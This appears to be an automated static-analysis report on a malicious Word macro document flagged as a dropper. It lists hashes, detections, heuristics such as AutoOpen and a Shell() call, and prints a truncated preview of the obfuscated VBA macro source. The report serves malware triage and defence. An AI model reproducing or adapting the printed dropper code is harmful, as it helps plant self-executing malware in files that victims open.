Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 727942c07a800e72…

MALICIOUS

Office (OLE)

254.0 KB Created: 2018-03-01 07:53:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: 5d01e5227c8f6e9b6f5dfeebcc2a7ad2 SHA-1: 121775986e0d899803f1cba6a38d9a78e89bb44f SHA-256: 727942c07a800e72ea2b35a34f6753310b949a7d637e4fbfa87b8f72f8f949fc
204 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The macro utilizes a Shell() call, a critical heuristic, suggesting it attempts to download and execute a second-stage payload. While the VBA code is heavily obfuscated, the presence of these indicators strongly points to a downloader or dropper functionality.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6459961-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6459961-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 91055 bytes
SHA-256: e5021b905c91a161d48826aa12a26641d4d7a83a80609b983c35219eaf558998
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 28 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "pCwOYtSbkdwQM"
Sub PkKRMrccu()
   On Error Resume Next
   While WcnkWYFUcsWK < HXiFXFqwvsDAds
      Set RfPMINsvFiFLY = nUzFmDtimF
      EmbkjjsjM = 503013 + Round(cJBlPbYXRuRVHX) - 687000 * Cos(9070139) / pAjtJqDaRLVwM + Chr(MaqrpDAnRKO)
      bnRTMjoBqLTD = TwKwQCYF / FuQjNrq
   Wend
   Select Case iZiWO
      Case 3131369
         zzpJKo = HnYWE
         pBHqiNhXDfSwK = 7976670
      Case 5556562
         YzEiBAQNOuaFm = HrnBLhRonB
         luTWNAzXNPb = Rnd(3490910)
      Case 4289848
         oktbnmckaXbJ = Atn(1805154)
         vcjJCzQGzq = Fix(340145 + 8934674 * 5233361 * ZNjYRNXzXNA)
   End Select
   For GBTvuDq = 4144051 To kfSPWXhmCZ
      LuKMrCswGzEWI = 7661675 - PmBvwDFFpiOJu
      Select Case pLVnHDMqHEsLu
         Case 2960969
            fIJbiIvkHb = ChrW(FpVictwGQmjj - CSng(kjYfz))
            mIqaJ = EhQhuaOLS
         Case 9509916
            VdbwNowsw = ChrB(JrzjPnDoj)
            OMEYLiYW = 2280401
      End Select
      XinJDCWEZ = Sitn - 3887449
      For hMAvqSzinKXlh = IZCniP To 5496962
         bBbEofNRwPM = (4640404 * 6498497 + DcUPbrYKAwFBuc * Sin(RuEOAlwU - CDbl(iSRWMHZJaJVa) * 3623274 * olIQBiw) / 7513234 * CLng(7075293 - CDate(zjUHJhNEIhlI)) / CwsWvalHtw + 6068829 / (drVzpoqh / YfnRAsvQRld - LFRIIDMzdEi / Int(7895814 - Round(fpsHStubtiSFE) + 9050110 / 6590721)))
      Next
   Next
End Sub
Function EwQcdXbHDGlfEZ()
On Error Resume Next
QGGhjwDPQUr = "UzrvzmwSj!!%ijwumDmTwdoAYzCL"
SYOLEfWDfB = inkadjqmPaSw = (827013 * 1253912 + ZXDzj * Sin(OsicjCrzBw - CDbl(vGLlBpfiD) * 6689625 * TuqsH) / 7858304 * CLng(9991915 - CDate(fXIKPvFw)) / hwnObvCwuOXiYV + 6062819 / (MYjlnvDzhSzmv / qwrizFvnrwnuMa - lHCdSCWVMJ / Int(7292987 - Round(nhIwPCzYbqpXZw) + 4862666 / 6366789)))
uLmWi = zticXvLwJdsT = (5153158 * 5964151 + LLIGiCYsN * Sin(AuRfD - CDbl(dpkOQDRQl) * 9452353 * GYGEA) / 2286465 * CLng(3082203 - CDate(OoSwiZA)) / bWAuRFHPi + 8100872 / (JItsUlBR / HwziBSph - rBpPhqt / Int(7165466 - Round(jARqa) + 2025814 / 9155935)))
rZAjjA = iuivbdfghnkjgyugjn(QGGhjwDPQUr, 17, 3)
ICwXNdzcPIs = "UCmMuPwjziiYINpCwsdasQmmtpLjQrkV"
QjkIZJHJo = ZOLOzwAt = (1602031 * 2296769 + Klnma * Sin(huIjEPs - CDbl(OXTzubihBdb) * 5771829 * BqCAWrXpkpiYtw) / 2646819 * CLng(2393349 - CDate(VwSfkYhuNkU)) / jJLwNjEFih + 4647462 / (tihlaBcUV / HcLSRRVG - GDMAjW / Int(5393563 - Round(RJGBnazlFqw) + 3754006 / 2381802)))
hUdMZSE = zHRBjl = (9041083 * 2926500 + kbZRRhdBOwUL * Sin(OQTBNhL - CDbl(ZnwwEFiimq) * 7172757 * XWZOI) / 6257203 * CLng(817235 - CDate(phUrwosBih)) / NDLLocSNb + 9031075 / (cHjInrrEt / cjlsSECQMhw - SXwML / Int(7037385 - Round(qTcjRFMInAAJ) + 5594485 / 7777660)))
ohMcndDMa = iuivbdfghnkjgyugjn(ICwXNdzcPIs, 11, 4)
OhkXjzhTr = "czZVRQTEiVniAQ tes&zXitIU"
EkiKkBU = rLUwbQYR = (1063728 * 5326841 + RFCcEucYdmELJC * Sin(KDjGkOLGz - CDbl(JkAswhjEPoDkVc) * 6518156 * KzimALwEGUkzqj) / 1047268 * CLng(9653258 - CDate(dvKbjf)) / YGtOT + 5049901 / (DYmEObKwwow / iwjNjjFirhXW - SaNtRhljlh / Int(5186274 - Round(crWui) + 9476168 / 4223011)))
hGUOwvCKz = uAHrtKfNvqW = (84656 * 2999151 + vBwFhGKFsP * Sin(JHsjjN - CDbl(BqkRSWAGCXk) * 8984683 * aoBvUwY) / 3119954 * CLng(3015900 - CDate(oHsmjDniM)) / mwYqiiaFaD + 7516403 / (wEfUFzOlo / mWvKakQC - sYRYcQLR / Int(7295681 - Round(TpMhTJoGP) + 9705240 / 8074883)))
TpJoFK = iuivbdfghnkjgyugjn(OhkXjzhTr, 7, 5)
QiYoZJu = "spfkmczWwwjttnrGO%FvDsaRwRZUiCdTO"
SIizCvimEk = JJqiEsLDPsiiBw = (1881203 * 3740063 + owEfotlmj * Sin(hodKsKY - CDbl(GiwXwUZNr) * 6737336 * svdjvKiISV) / 3058273 * CLng(932366 - CDate(UiiOlhmXcZDoc)) / CjGbCCIq + 3542129 / (HhANB / CqZECS - KbJwGPWZrTtcZ / Int(2447750 - Round(NCjdLbHEhYWWW) + 2521009 / 2827854)))
BiVSsq = OjuvzsGCb = (9213977 * 5735796 + NGkctIcX * Sin(ZGODXcXkt - CDbl(MdwfsiQuUvjCQz) * 8324573 * aotdOkqBodfsc) / 
... (truncated)